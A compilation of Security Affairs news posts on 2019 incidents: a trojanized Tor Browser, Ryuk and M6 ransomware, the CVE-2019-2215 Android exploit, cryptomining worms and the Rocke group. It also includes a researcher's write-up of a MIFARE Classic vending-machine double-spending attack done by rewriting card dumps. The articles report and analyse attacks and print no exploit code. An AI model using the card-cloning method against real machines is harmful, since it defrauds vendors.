A tainted version of the Tor Browser is targeting dark web market shoppers to steal their cryptocurrency and gather information on their browsing activity.

A Trojanized version of the Tor Browser is targeting shoppers of black marketplaces in the dark web, threat actors aim to steal their cryptocurrency and gather information on their browsing activity.

At the time of writing, attackers have already stolen about $40,000 worth of Bitcoin through more than 860 transactions registered to three of the attackers’ wallets.

“Utilizing a trojanized version of an official Tor Browser package, the cybercriminals behind this campaign have been very successful – so far their pastebin.com accounts have had more than 500,000 views and they were able to steal US$40,000+ in bitcoins.” reads a post published by ESET.

The weaponized version of the Tor Browser is promoted on Pastebin as the Russian version of the popular software. The Pastebin posts advertise the version saying that it also includes an anti-captcha feature that allows users to speed-up the browsing activity.

The trojanized Tor browser variant is hosted on the following two domains created in 2014 that are designed to appear as the official Russian version of the software:

  • tor-browser[.]org
  • torproect[.]org (the URL is missing “j”)

Threat actors also optimized the posts promoting the malicious software to appear as top results for queries for drugs, censorship bypass, and Russian politicians.

Between 2017 and early 2018, crooks promoted the webpages of the trojanized Tor Browser using spam messages on multiple Russian forums.

The home page of both sites displays a warning to the visitors informing them that they have an outdated Tor Browser, even if the visitors are using the most up-to-date Tor Browser version.

Trojanized Tor browser

“Your anonymity is in danger! WARNING: Your Tor Browser is outdated. Click the button “Update” reads the English translations.

When the users click on the “Update Tor Browser” button, they are redirected to a second website that delivers a Windows installer.

“This trojanized Tor Browser is a fully functional application. In fact, it is based on Tor Browser 7.5, which was released in January 2018. Thus, non-technically-savvy people probably won’t notice any difference between the original version and the trojanized one.” continues the analysis.

“No changes were made to source code of the Tor Browser; all Windows binaries are exactly the same as in the original version. However, these criminals changed the default browser settings and some of the extensions.”

The Trojanized Tor Browser has disabled the update feature to prevent victims from updating to a non-tainted version, attackers also changed the default User-Agent to the unique hardcoded value that is used by threat actors as a fingerprint.

“The most important change is to the xpinstall.signatures.required settings, which disable a digital signature check for installed Tor Browser add-ons.” reads the post. “Therefore, the attackers can modify any add-on and it will be loaded by the browser without any complaint about it failing its digital signature check.”

Crooks also modified the HTTPS Everywhere add-on included with the browser to add a content script (script.js) that will be executed on load in the context of every webpage.

The JavaScript payload uses a standard webinject mechanism that allows stealing content in forms, hiding original content, showing fake messages, or adding its own content.

The only JavaScript payload observed by ESET was used to target visitors of three of the largest Russian-speaking darknet markets. This script attempts to alter QIWI (a popular Russian money transfer service) or bitcoin wallets located on pages of these markets.

Using this trick, attackers are able to hijack payments by changing the wallet address of the shoppers with the ones belonging to the attackers.

“As of this writing, the total amount of received funds for all three wallets is 4.8 bitcoin, which corresponds to over US$40,000. It should be noted that the real amount of stolen money is higher because the trojanized Tor Browser also alters QIWI wallets.” concludes ESET that also shared IoCs. “This trojanized Tor Browser is a non-typical form of malware, designed to steal digital currency from visitors to darknet markets. Criminals didn’t modify binary components of the Tor Browser; instead, they introduced changes to settings and the HTTPS Everywhere extension. This has allowed them to steal digital money, unnoticed, for years.”

Pierluigi Paganini

(SecurityAffairs – Trojanized Tor Browser, hacking)

The post Trojanized Tor Browser targets shoppers of Darknet black marketplaces appeared first on Security Affairs.

Pitney Bowes revealed that its systems were infected with Ryuk Ransomware

The global shipping and mailing services company Pitney Bowes revealed that the recent partial outage was caused by the Ryuk ransomware.

The global shipping and mailing services company Pitney Bowes recently suffered a partial outage of its service caused by a ransomware attack. Pitney Bowes is a global technology company that provides commerce solutions in the areas of ecommerce, shipping, mailing, data and financial services.

The company now published an update on the attack, it confirmed that the root cause of the disruptions of its services was “the Ryuk virus malware attack.”

“This is an update to the status of Pitney Bowes recovery from the Ryuk virus malware attack on some of our systems that disrupted client access to some of our services.” reads the update shared by the company. “Upon discovery of the attack, with the support of third-party advisors, we immediately began working on a plan and thorough process of systems restoration with the goal of restoring service as quickly as possible. We have also been reaching out to our clients, partners, and employees.”

The mailing system products were paralyzed by the attack, the company confirmed that immediately after the attack the following systems were NOT working:

  • Clients are unable to refill postage or upload transactions on their mailing machine
  • SendPro Online in the UK and Canada
  • Hosted instances of SendSuite Live, SendSuite Express, SendSuite Tracking (SST)
  • Accounting solutions such as Inview, Business Manager and Account List Management
  • Your Account and the Pitney Bowes Supplies web store cannot be accessed. This in turn impacts clients subscribed to AutoInk and our Supplies App

The company announced that currently it has restored many of the impacted systems.

The Ryuk ransomware was involved in a long string of attacks targeting cities, hospitals, and organizations worldwide.

In September New Bedford city was infected with Ryuk ransomware, but did not pay $5.3M ransom. In April, systems at Stuart City were infected by the same Ryuk ransomware, in early March, Jackson County, Georgia, was hit by the same ransomware that paralyzed the government activity until officials decided to pay a $400,000 ransom to decrypt the files.

Pierluigi Paganini

(SecurityAffairs – Ryuk Ransomware, Pitney Bowes)

The post Pitney Bowes revealed that its systems were infected with Ryuk Ransomware appeared first on Security Affairs.

Researcher released PoC exploit code for CVE-2019-2215 Android zero-day flaw

A researcher has published a proof-of-concept (PoC) exploit code for the CVE-2019-2215 zero-day flaw in Android recently addressed by Google

Earlier October, Google Project Zero researchers Maddie Stone publicly disclosed a zero-day vulnerability, tracked as CVE-2019-2215, in Android.

According to the expert, the bug was allegedly being used or sold by the controversial surveillance firm NSO Group.

Maddie Stone published technical details and a proof-of-concept exploit for the high-severity security vulnerability, seven days after she reported it to the colleagues of the Android security team.

The flaw is a use-after-free vulnerability that affects the Android kernel’s binder driver, it could be exploited by a local privileged attacker or a malicious app to escalate privileges to gain root access to a vulnerable device. Experts warn it could potentially allow to fully compromise the device.

The flaw affects versions of Android kernel released before April last year. This vulnerability was addressed in Dec 2017 in the 4.14 LTS kernel [1], AOSP android 3.18 kernel [2], AOSP android 4.4 kernel [3], and AOSP android 4.9 kernel [4]. The expert pointed out that Pixel 2 with most recent security bulletin is still vulnerable based on source code review.

This means that most of the Android devices available on the market with the unpatched kernel are still vulnerable to this vulnerability, even is the owners have installed the latest Android security updates.

Some of the devices which appear to be vulnerable based on source code review are:

1) Pixel 2 with Android 9 and Android 10 preview (https://android.googlesource.com/kernel/msm/+/refs/heads/android-msm-wahoo-4.4-q-preview-6/)
2) Huawei P20
3) Xiaomi Redmi 5A
4) Xiaomi Redmi Note 5
5) Xiaomi A1
6) A3
7) Moto Z3
8) Oreo LG phones (run according to )
9) Samsung S7, S8, S9

Maddie Stone explained that the flaw is accessible from inside the Chrome sandbox, the issue is exploitable in Chrome’s renderer processes under Android’s ‘isolated_app’ SELinux domain. This means that a remote attacker could potentially exploit the flaw by chaining it with a Chrome rendering issue

Last week, Google released security patches for Android, the tech giant announced that patches to address the CVE-2019-2215 in Pixel 1 and Pixel 2 devices will be included in the October update.

Now the researchers Grant Hernandez, a PhD candidate at the Florida Institute of Cyber Security at the University of Florida, has publicly disclosed a PoC exploit code for the CVE-2019-2215 vulnerability.

“All I needed to do was compile the exploit and run it over ADB. I downloaded the latest Android NDK and compiled the proof of concept. I ran it on my device and confirmed that I was able to reproduce Maddie Stone’s screenshot exactly.” reads a blog post published by Hernandez.

“The base PoC left us with a full kernel read/write primitive, essentially game over for the systems’ security, but left achieving root as an exercise for the reader,”

The expert explained that an attacker that aims to get a full root shell would need to bypass multiple layers of security defense implemented by Google, including Discretionary Access Control (DAC), Mandatory Access Control (MAC), Linux Capabilities (CAP), SECCOMP, Android Middleware.

Hernandez pointed out that an app accessible kernel exploit allows the attacker to easily bypass or disable all of these layers of defenses.

The expert detailed how to bypass DAC and CAP and how to disable SELinux and SECCOMP. The expert created a one-click rooting application called Qu1ckR00t.

“Once I had a reliable working exploit that I could use over ADB, I decided it would be neat to see the exploit working from an application context. I created Qu1ckR00t (the name is satire) as a one-click rooting application that also YOLO-installs™ Magisk.” concludes the researchers that published the PoC exploit code on GitHub. “There is nothing novel about Qu1ckR00t, but it is cool to get a little taste of a typical iOS jailbreaking flow on Android. Maybe in the future if OEMs like Samsung completely remove OEM Unlock, this kind of rooting method will return to popularity.”

Pierluigi Paganini

(SecurityAffairs – CVE-2019-2215, zero-day)

The post Researcher released PoC exploit code for CVE-2019-2215 Android zero-day flaw appeared first on Security Affairs.

Cryptocurrency miners infected more than 50% of the European airport workstations

Researchers at Cyberbit spotted a crypto mining campaign that infected more than 50% of the European airport workstations. 

Security experts at Cyberbit have uncovered a crypto mining campaign that infected more than 50% of the European airport workstations. 

European airport systems were infected with a Monero cryptocurrency miner that was linked to the Anti-CoinMiner campaign discovered this summer by Zscaler researchers.  

“While rolling out Cyberbit’s  Endpoint Detection and Response (EDR) in an international airport in Europe, our researchers identified an interesting crypto mining infection, where cryptocurrency mining software was installed on more than 50% of the airport’s workstations.” reads the analysis published by Cyberbit.

Experts pointed out that the Monero miners were installed on the European airport systems, even if they were running an industry-standard antivirus. Threat actors were able to package the miner evading the detection of ordinary antivirus.

“The malware we found was first discovered by Zscaler more than a year ago,” continues Cyberbit. “It was modified just enough to evade the vast majority of existing signatures for it, with only 16 out of 73 detection products on VirusTotal detecting the sample as malicious.”

The good news is that the miner did not impact the airport’s operations.

Experts’ behavioral engine detected a suspicious usage of the PAExec tool used to execute an application named player.exe.

PAExec is a redistributable version of the legitimate Microsoft PSExec tool that is used to run Windows programs on remote systems without having to physically install software on them. The execution of the PAExec tool is often associated with an ongoing attack, in this case, hackers used it for to launch the Player executable “in system mode.”

Experts also observed the use of Reflective DLL Loading after running player.exe. The technique allows the attackers to remotely inject a DLL directly into a process in memory.

“This impacts the performance of other applications, as well as that of the airport facility. The use of administrative privileges also reduces the ability for security tools to detect the activity.” continues the report.

In order to gain persistence, attackers added an entry in the systems’ registries for the PAExec.

At the time, researchers were not able to determine how attackers infected the European Airport systems.

“Because the malware happened to be a cryptominer, its business impact was relatively minor, limited to performance degradations leading to quality of service and service interruptions, as well as a significant increase in power consumption throughout the airport.” concludes Cyberbit.

“In a worst-case scenario, attackers could have breached the IT network as a means to hop onto the airport’s OT network in order to compromise critical operational systems ranging from runway lights to baggage handling machines and the air-train, to name a few of the many standard airport OT systems that could be cyber-sabotaged to cause catastrophic physical damage,”

Pierluigi Paganini

(SecurityAffairs – European airport workstations, miner)

The post Cryptocurrency miners infected more than 50% of the European airport workstations appeared first on Security Affairs.

Critical and high-severity flaws addressed in Cisco Aironet APs

A critical flaw in Aironet access points (APs) can be exploited by a remote attacker to gain unauthorized access to vulnerable devices.

Cisco disclosed a critical vulnerability in Aironet access points (APs), tracked as CVE-2019-15260, that can be exploited by a remote, unauthenticated attacker to gain unauthorized access to vulnerable devices with elevated privileges. This vulnerability was discovered during the resolution of a Cisco TAC support case.

Cisco has already released software updates that address the flaw, the company pointed out that there are no workarounds that fix this vulnerability.

The flaw is caused by insufficient access control for some URLs, an attacker could exploit the flaw by simply requesting the unprotected URLs.

“The vulnerability is due to insufficient access control for certain URLs on an affected device. An attacker could exploit this vulnerability by requesting specific URLs from an affected AP. An exploit could allow the attacker to gain access to the device with elevated privileges.” reads the security advisory published by Cisco.

The vulnerability affects Aironet 1540, 1560, 1800, 2800, 3800 and 4800 series APs. Cisco released versions 8.5.151.0, 8.8.125.0 and 8.9.111.0 to address the vulnerability.

Cisco revealed that there is no evidence of attacks exploiting the flaw in the wild.

Aironet APs are also affected by two high-severity flaws that can be exploited by an unauthenticated attacker to trigger a denial-of-service (DoS) condition.

The first flaw, tracked as CVE-2019-15261, impacts the Point-to-Point Tunneling Protocol (PPTP) VPN packet processing functionality.

“A vulnerability in the Point-to-Point Tunneling Protocol (PPTP) VPN packet processing functionality in Cisco Aironet Access Points (APs) could allow an unauthenticated, remote attacker to cause an affected device to reload, resulting in a denial of service (DoS) condition.” states the Cisco advisory. “The vulnerability is due to insufficient validation of Generic Routing Encapsulation (GRE) frames that pass through the data plane of an affected AP. An attacker could exploit this vulnerability by associating to a vulnerable AP, initiating a PPTP VPN connection to an arbitrary PPTP VPN server, and sending a malicious GRE frame through the data plane of the AP. A successful exploit could allow the attacker to cause an internal process of the targeted AP to crash, which in turn would cause the AP to reload. The AP reload would cause a DoS condition for clients that are associated with the AP.

The second flaw, tracked as CVE-2019-15264, while the other resides in the Control and Provisioning of Wireless Access Points (CAPWAP) protocol.

“A vulnerability in the Control and Provisioning of Wireless Access Points (CAPWAP) protocol implementation of Cisco Aironet and Catalyst 9100 Access Points (APs) could allow an unauthenticated, adjacent attacker to cause an affected device to restart unexpectedly, resulting in a denial of service (DoS) condition.” reads the security advisory published by Cisco.

“The vulnerability is due to improper resource management during CAPWAP message processing. An attacker could exploit this vulnerability by sending a high volume of legitimate wireless management frames within a short time to an affected device. A successful exploit could allow the attacker to cause a device to restart unexpectedly, resulting in a DoS condition for clients associated with the AP.”

Pierluigi Paganini

(SecurityAffairs – Cisco Aironet APs, zero-day)

The post Critical and high-severity flaws addressed in Cisco Aironet APs appeared first on Security Affairs.

International operation dismantled largest Dark Web Child abuse site

The United States Department of Justice announced the arrest of hundreds of criminals as part of a global operation against a dark web child abuse community.

The US Department of Justice announced the arrest of hundreds of criminals as part of a global operation conducted against the crime community operating the largest dark web child porn site, ‘Welcome to Video’.

The operation involved law enforcement agencies from several countries, including the IRS-CI, the US Homeland Security Investigations, the NCA, the Korean National Police of the Republic of Korea, and German Federal Criminal Police (the Bundeskriminalamt), 

Officials have arrested the administrator of the site, Jong Woo Son of South Korea (23), along with 337 suspects in 38 countries that have been charged for allegedly being users of the site.

Two former federal law enforcement officials were allegedly involved in the child porn site, Paul Casey Whipple and Richard Nikolai Gratkowski.

The US authorities issued a warrant for Son’s arrest on February 2018, and South Korean police arrested the man on March 5, 2018, and seized the server used to operate Welcome To Video.

According to the indictment, the ‘Welcome to Video’ child abuse site was launched in June 2015 and operated until March 2018. The site received at least 420 BTC in three years through at least 7300 transactions.

Experts from the National Center for Missing and Exploited Children (NCMEC) are currently analyzing over 250,000 unique videos hosted on the website, 45 percent of them contain new images that have not been previously known to exist.

“According to the indictment, on March 5, 2018, agents from the IRS-CI, HSI, National Crime Agency in the United Kingdom, and Korean National Police in South Korea arrested Son and seized the server that he used to operate a Darknet market that exclusively advertised child sexual exploitation videos available for download by members of the site.” reads a press release published by the DoJ.  “The operation resulted in the seizure of approximately eight terabytes of child sexual exploitation videos, which is one of the largest seizures of its kind.”

The great news is that the operation allowed to rescue tens of children living in the United States, Spain, and the United Kingdom.

According to the indictment, the law enforcement experts discovered the Child abuse website was hosted on the IP address 121.185.153.64 and 121.185.153.45 that was registered by a provider in South Korea and were registered with an account serviced at the defiant’s home.

Experts also identified more than one million unique bitcoin addresses that were used to receive payments from the users of the website. Two users of the Darknet market committed suicide subsequent to the execution of search warrants.

“Welcome To Video offered these videos for sale using the cryptocurrency bitcoin.  Typically, sites of this kind give users a forum to trade in these depictions.  This Darknet website is among the first of its kind to monetize child exploitation videos using bitcoin.  In fact, the site itself boasted over one million downloads of child exploitation videos by users.  Each user received a unique bitcoin address when the user created an account on the website.” continues the press release. “An analysis of the server revealed that the website had more than one million bitcoin addresses, signifying that the website had capacity for at least one million users.”

Though Son is currently serving an 18-month sentence in South Korea, a federal grand jury in Washington DC unsealed a 9-count indictment against him just yesterday, with the U.S. authorities seeking his extradition to face justice.

Darknet sites that profit from the sexual exploitation of children are among the most vile and reprehensible forms of criminal behavior,” said Assistant Attorney General Brian A. Benczkowski of the Justice Department’s Criminal Division. “This Administration will not allow child predators to use lawless online spaces as a shield. Today’s announcement demonstrates that the Department of Justice remains firmly committed to working closely with our partners in South Korea and around the world to rescue child victims and bring to justice the perpetrators of these abhorrent crimes.”

Pierluigi Paganini

(SecurityAffairs – Child abuse, cybercrime)

The post International operation dismantled largest Dark Web Child abuse site appeared first on Security Affairs.

Graboid the first-ever Cryptojacking worm that targets Docker Hub

Security experts at Palo Alto Networks discovered a worm dubbed Graboid that spreads using Docker containers.

Palo Alto Networks researchers discovered a new Monero miner with wormable capabilities, dubbed Graboid, that spreads using Docker containers.

Experts discovered that to target new systems, the Graboid worm periodically queries the C&C for vulnerable hosts, in this way the malicious code is instructed about the next target to infect.

“Unit 42 researchers identified a new cryptojacking worm we’ve named Graboid that’s spread to more than 2,000 unsecured Docker hosts. We derived the name by paying homage to the 1990’s movie “Tremors,” since this worm behaves similarly to the sandworms in the movie, in that it moves in short bursts of speed, but overall is relatively inept.” reads the analysis published by the experts.

Graboid is the first-ever Cryptojacking worm found in images on Docker Hub, the analysis conducted by the experts shows that, on average, each miner is active 63% of the time, with the mining periods being of 250 seconds.

Palo Alto Networks found over 2,000 Docker engines unsecured online, this means that threat actors could to take full control of them and abuse their resources for malicious purposes.

The hackers first compromise an unsecured Docker daemon, then they ran the malicious container from Docker Hub, it fetches scripts and a list of vulnerable hosts from the C&C, and spread targeting the host in the list.

‘Graboid’ implements both worm-spreading and cryptojacking capabilities inside containers. The experts noticed that the malware randomly selects three targets at each iteration. It installs the worm on the first target, stops the miner on the second target, and starts the miner on the third target, leading to a very random mining behavior.

“Essentially, the miner on every infected host is randomly controlled by all other infected hosts. The motivation for this randomized design is unclear. It can be a bad design, an evasion technique (not very effective), a self-sustaining system or some other purposes.” continues the analysis.

Experts reported that the malicious Docker image (pocosow/centos) has been downloaded more than 10,000 times from Docker Hub, while the gakeaws/nginx image has been downloaded over 6,500 times.

“While this cryptojacking worm doesn’t involve sophisticated tactics, techniques, or procedures, the worm can periodically pull new scripts from the C2s, so it can easily repurpose itself to ransomware or any malware to fully compromise the hosts down the line and shouldn’t be ignored.” concludes the analysis. “If a more potent worm is ever created to take a similar infiltration approach, it could cause much greater damage, so it’s imperative for organizations to safeguard their Docker hosts.”

Pierluigi Paganini

(SecurityAffairs – Graboid, hacking)

The post Graboid the first-ever Cryptojacking worm that targets Docker Hub appeared first on Security Affairs.

M6 Group, largest France private multimedia group, hit by ransomware attack

M6, one of France’s biggest TV channels, hit by ransomware

Unlike The Weather Channel earlier this year, M6 remained on the air.

The M6 Group, the largest France private multimedia group, was the victim of ransomware over the weekend.

The systems at the M6 Group, France’s largest private multimedia group, were infected with the ransomware over the weekend, fortunately, none of the company’s TV and radio channels interrupted the broadcasts.

According to the French newspaper L’Express, the ransomware attack only impacted landlines and e-mail.

“The company’s phone lines and e-mail are unusable, so employees have to use their mobile phones and text messages to communicate,” an internal source told the newspaper. “all the office and management tools are in disruption.” 

The company revealed the incident took place on Saturday.

The cybersecurity staff at the M6 Group was able to immediately mitigate the threat preventing any downtime its TV channels, radio stations, and film studios.

“The M6 ​​Group was the target of a malicious computer attack on Saturday morning, and the quick and efficient intervention of our cyber security experts has helped to ensure the continued security of the Internet. good broadcasting of the programs on all our TV and radio antennas “.  reads the message posted through the Twitter account of the group.

In April, another broadcast suffered a similar incident, a cyber attack hit the Weather Channel and forced it off the air for at least 90 minutes.

In April 2015, the TV5Monde was hit by a severe cyber attack that compromised broadcasting of transmissions across its medium. The attackers also hijacked the Channel TV5Monde website and social media accounts of the French broadcaster.

Yves Bigot, at the time the director-general of TV5Monde told the BBC that the cyber-attack came close to destroying the network of the French TV and investigation suggested Russia-linked APT28 group.

Pierluigi Paganini

(SecurityAffairs – M6 Group, ransomware)

The post M6 Group, largest France private multimedia group, hit by ransomware attack appeared first on Security Affairs.

Signature update for Symantec Endpoint protection crashed many device

Symantec rolled out an intrusion prevention signature update for its Endpoint Protection product that has caused many devices to crash and display a so-called blue screen of death (BSOD).

An intrusion prevention signature update for the Endpoint Protection product had a bad impact on the devices, in many cases it caused the devices to crash and display the blue screen of death (BSOD).

Several users reported problems through the company’s support forums and other sites online.

Customers complained about problems with Windows 7, 8 and 10.

Symantec Endpoint Protection

Symantec has acknowledged the problem with the update to its Endpoint Protection Client explaining that it causes a Windows kernel exception.

The company released the version 2019/10/14 r62 to address the issue caused by the 2019/10/14 r61 update.

“After running LiveUpdate on Symantec Endpoint Protection (SEP), the computer crashes indicating IDSvix86.sys/IDSvia64.sys as the cause of the exception.” reads the security advisory published by the researchers.

Symantec recommends to download the new signature version for the Endpoint Protection or roll back to an earlier stable version.

“Please run LiveUpdate to download latest Intrusion Prevention signature 2019/10/14 r62, or rollback to an earlier known good content revision to prevent the BSOD situation. Please check How to Backdate Virus Definitions in Endpoint Protection Manager for more details on how to roll back definitions.” continues Symantec.

Customers who cannot run LiveUpdate to apply the signatures on their systems can use the following workaround:

  1. Boot in Safe Mode and perform the following for x64 or x86 installations of SEP,
  2. Run sc config idsvia64 start= disabled or sc config idsviax86 start=disabled from cmd,
  3. Reboot in normal mode,
  4. Update the IPSdefs,
  5. Run sc config idsvia64 start= system or sc config idsviax86 start=system from cmd
  6. Reboot.

Pierluigi Paganini

(SecurityAffairs – Symantec, BSOD)

The post Signature update for Symantec Endpoint protection crashed many device appeared first on Security Affairs.

Approaching the Reverse Engineering of a RFID/NFC Vending Machine

Security expert Pasquale Fiorillo demonstrates how to hack n RFID/NFC Vending Machine.

The affected vendor did not answer to my responsible disclosure request, so I’m here to disclose this “hack” without revealing the name of the vendor itself.

The target vending machine uses an insecure NFC Card, MIFARE Classic 1k, that has been affected by multiple vulnerabilities so should not be used in important application.
Furthermore, the user’s credit was stored on the card enabling different attack scenarios, from double spending to potential data tamper storing an arbitrary credit.

Useful notes from MIFARE Classic 1K datasheet:

EEPROM: 1 kB is organized in 16 sectors of 4 blocks. One block contains 16 bytes.
The last block of each sector is called “trailer”, which contains two secret keys and programmable access conditions for each block in this sector.

  • Manufacturer block: This is the first data block (block 0) of the first sector (sector 0). It contains the IC manufacturer data. This block is read-only.
  • Data blocks: All sectors contain 3 blocks of 16 bytes for storing data (Sector 0 contains only two data blocks and the read-only manufacturer block).
    The data blocks can be configured by the access conditions bits as:
    • Read/Write blocks: fully arbitrary data, in arbitrary format
    • Value blocks: fixed data format which permits native error detection and correction and a backup management.
      A value block can only be generated through a write operation in value block format:
      • Value: Signifies a signed 4-byte value. The lowest significant byte of a value is stored in the lowest address byte. Negative values are stored in standard 2´s complement format. For reasons of data integrity and security, a value is stored three times, twice non-inverted and once inverted.
      • Adr: Signifies a 1-byte address, which can be used to save the storage address of a block, when implementing a powerful backup management. The address byte is stored four times, twice inverted and non-inverted.
Value block example for value 0x0012D687

Let’s start hacking:

In this post I did not show you how to crack the MIFARE Classic Keys needed to read/write the card, ’cause someone else has already disclosed it some time ago, so google is your friend.
At last, please, use this post to skill yourself about the fascinating world of reverse engineering, and not for stealing stuffs.

In order to start the analysis I need some dump to compare.
The requirements of this task are nfc-mfclassic tool included in libnfc, a NFC hardware interface like ACR122U, and a binary compare (aka binarydiff) tool like dhex.

Dumps:

  • Dump 0: Virgin card (not included in the screenshot below ’cause all data bytes were 0x00, except for the sector 0 that has UID and manufacturer information. These sector is read only, so these bytes are the same across dumps)
  • Dump 1: Card charged with single 0.10€ coin (Note that vending machine displays the balance with 3 decimals, 0.100€)
  • Dump 2: 0.00€ after spending the entire balance with 4 transactions of 0.025€ each
  • Dump 3: 0.10€ recharged with one single coin
Dump 1 compared to Dump 2, yellow bytes differ
Dump 2 compared Dump 3, yellow bytes differ

Blurred bytes are the MIFARE keys A and B, except for the 32 bytes at 0xE0 offset of which I don’t know their purpose.
The 4 bytes between the keys are Access Condition and denotes which key must be used for read and write operation (A or B key) and the block type (“read/write block” or “value block”).

The tool mfdread is useful to decode the Access Condition bytes rapidly, and, in general, to display MIFARE Classic data divided by sectors and blocks:

Dump 1 with mfdread parser

Early analysis:

Note: from now on I will refer to the offsets with a [square parenthesis] and a value with no parenthesis.

  • Blocks 8, 9, 10, 12 and 13 can be used also as “value block”
  • Except for bytes between offsets [0x80] and [0x9F], only few bytes differ between dumps
  • Some data are redundant, for example [0x60 … 0x63] has the same values of [0xA0 … 0xA3]
  • Values at [0xC0], [0xD0], [0xC8], [0xD8] differ by 4 between 1st and 2nd dump (eg: 0xFE – 0xFA = 0x4) and differ by 1 between 2nd dump and 3rd dump (eg: 0xFA – 0xF9 = 0x1)
  • Values at [0xC4], [0xD4] differ by 4 between 1st and 2nd dump (eg: 0x05 – 0x01 = 0x4) and differ by 1 between 2nd and 3rd dump (eg: 0x06 – 0x05 = 0x1)
    • 4 is the number of spent transaction made the first time, and 1 is the number of recharge transaction made the second time
  • Sum between yellow squared and red squared offsets has 0xFF value. In other words red squared is inverse (XOR with 0xFF) of yellow squared. For example:
    • 0xFE ⊕ 0xFF = 0x01
    • 0xFF ⊕ 0xFF = 0x00
    • 0x7F ⊕ 0xFF = 0x80
  • Values at [0x60 … 0x63] are a UNIX TIMESTAMP in little endian notation:
    • Dump 1: 0x4F9E2C27 -> 0x272C9E4F = 657235535 = 10/29/1990 @ 9:25pm
    • Dump 2: 0x71B62C27 -> 0x272CB671 = 657241713 = 10/29/1990 @ 11:08pm
    • Dump 3: 0x18592D27 -> 0x272D5918 = 657283352 = 10/30/1990 @ 10:42am
      • Ok, we are not in the 90ies, but the time difference between transactions is correct, maybe the vending machine doesn’t have an UPS 🙂

Early findings:

  • Timestamp of the last transaction was stored as 32 bit integer at MIFARE block 6 and redundant at at MIFARE block 10
  • Only MIFARE blocks 12 and 13 has “Value block” format, and they are used to store the counter of remain transaction in 32 bit format.
    This counter starts from 0x7FFFFFFF (2.147.483.647) and is decreased at each transaction
  • Blocks 1, 4, and 14 contains some data that are fixed between dumps
  • Blocks 8 and 9 changes entirely at each transaction

The credit:

If there is credit stored on the card, it was encoded at blocks 8 and 9, and the number of bytes involved between small credit difference (for example between 0.00€ and 0.10€) could indicate that some cryptographic function is involved.

At this time, a double spending attack could confirm if the credit is really stored on the card.
So, after spending all the credit, I have rewritten a previous dump on the card and I went to test it at the vending machine. The card was fully functional with the previous credit stored in that dump. Now, I’m certain that the credit is encoded (and probably encrypted) in the blocks 8 and 9.

Conclusion:

Even if the encoding format of the credit is still unknown, a double spending attack was possible.

This means that the vendor’s effort to obfuscate the credit is nullified 🙁

Adding some unique token on the card that are invalidated into back-end after each transaction, means that this token needs to be shared between all the vending machines of the vendor, but, if we add internet connection to the vending machine, there is no longer reason to store the credit on the card.

So, after all, the only remediation action that makes sense is: DO NOT STORE THE CREDIT ON THE CARD! And, more generally: DO NOT TRUST THE CLIENT!

Road to arbitrary credit:

Spending 1€ infinite times isn’t the scope of that hack. The only real scope is FUN!
To continue this analysis I need to collect a large number of dumps to advance some hypothesis so, when I have other material I will make another post.

An example of easier card:

Some vendor has more easier approach by using the MIFARE “Value block” to store the credit without obfuscation or encryption.

Credit stored on the MIFARE Value Block

The above screenshot made with “MIFARE Classic Tool” on Android smartphone, represents a Value Block used to store the credit:

0x00000CE4 = 3300 is the value in Euro thousandths (3.30€).

This particular vendor do not use key A and the Key B is a default key 0xFFFFFFFFFFFFFFFF, so the attacker doesn’t need to crack anything.

Reverse engineering and cracking of a Vending Machine is always funny.

The original post was published here

About the author: Pasquale Fiorillo

I’m a Security Auditor of ISGroup and an independent Security Researcher. As Security Auditor, my job is to perform security activities like Penetration Test and Vulnerability Assessment on networks and web applications in order to identify security issues that may be exploited by an attacker to perform malicious actions on your assets.

When I was a teenager I have co-founded an underground e-zine called Italian Hard Phreaking with some friends on IRC, writing lots of papers related to hack and reverse engineering stuffs in the telecommunication world. Later, I’ve started a new adventure as a Security Researcher, discovering vulnerabilities in a commonly used software, web applications, and web sites, in collaboration with other fabulous people of U.S.H.

Pierluigi Paganini

(SecurityAffairs – iCloud, zero-day)

The post Approaching the Reverse Engineering of a RFID/NFC Vending Machine appeared first on Security Affairs.

Chinese-speaking cybercrime gang Rocke changes tactics

Chinese-speaking cybercrime gang Rocke that carried out several large-scale cryptomining campaigns, has now using news tactics to evade detection.

Chinese-speaking cybercrime gang Rocke, that carried out several large-scale cryptomining campaigns in past, has now using news tactics to evade detection. The group has been observed using new tactics, techniques, and procedures (TTPs), it is also using updated malware to evade detection.

The cybercrime organization was first spotted in April 2018 by researchers at Cisco Talos, earlier 2019 researchers from Palo Alto Networks Unit42 found new malware samples used by the Rocke group for cryptojacking that uninstalls from Linux servers cloud security and monitoring products developed by Tencent Cloud and Alibaba Cloud.

In March, the group was using a dropper dubbed LSD that was controlled via Pastebin, but since this summer the threat actors have changed Command and Control (C2) infrastructure using a self-hosted solution.

The malicious code is used by the hackers to deliver a Moner (XMR) crypto miner that is not detected by almost any antivirus solution.

The Rocke group was also observed exploiting the CVE-2019-3396 flaw in Confluence servers to get remote code execution and deliver the miners.

“Rocke, a China-based cryptomining threat actor, has changed its Command and Control (C2) infrastructure away from Pastebin to a self-hosted solution during the summer of 2019.” reads the analysis published by the security firm Anomaly. “the actor moved away from hosting the scripts on dedicated servers and instead started to use Domain Name System (DNS) text records. These records are accessed via normal DNS queries or DNS-over-HTTPs (DoH) if the DNS query fails. In addition to the C2 change, functionality was also added to their LSD malware to exploit ActiveMQ servers vulnerable to CVE-2016-3088.”

The use of self-hosted and DNS records makes it hard to detect the group’s operations and takedowns. The new LSD sample was first spotted on September 17 as reported in the following graph.

The group also improved its LSD dropper by adding the malicious code to exploit CVE-2016-3088 in ActiveMQ servers.

In order to ensure that only its miner is running on the infected machine, the group attempt to kill any other processes with high CPU usage. The LSD malware analyzed the MD5 hash of the files to avoid killing its instance running on the system.

“Rocke keeps evolving its TTPs in attempts to remain undetected. By moving away from hosting scripts on Pastebin to self-hosted and DNS records, the threat actor is more protected against potential take-downs that could prevent ongoing malicious activity,” concludes Anomali Labs.

“It is expected that the group will continue to exploit more vulnerabilities to mine additional cryptocurrencies in the near future.”

Technical details, including Indicators of Compromise, are reported in the analysis published by Anomali.

Pierluigi Paganini

(SecurityAffairs – Rocke cybercrime gang, miner)

The post Chinese-speaking cybercrime gang Rocke changes tactics appeared first on Security Affairs.

Adobe out-of-band security updates address 82 flaws in 3 products

Adobe has released out-of-band security updates to address a total of 82 security vulnerabilities that affect three products of the company.

On Tuesday, Adobe released out-of-band security updates to address 82 flaws in Acrobat and Reader, Experience Manager, Experience Manager Forms, and Download Manager.

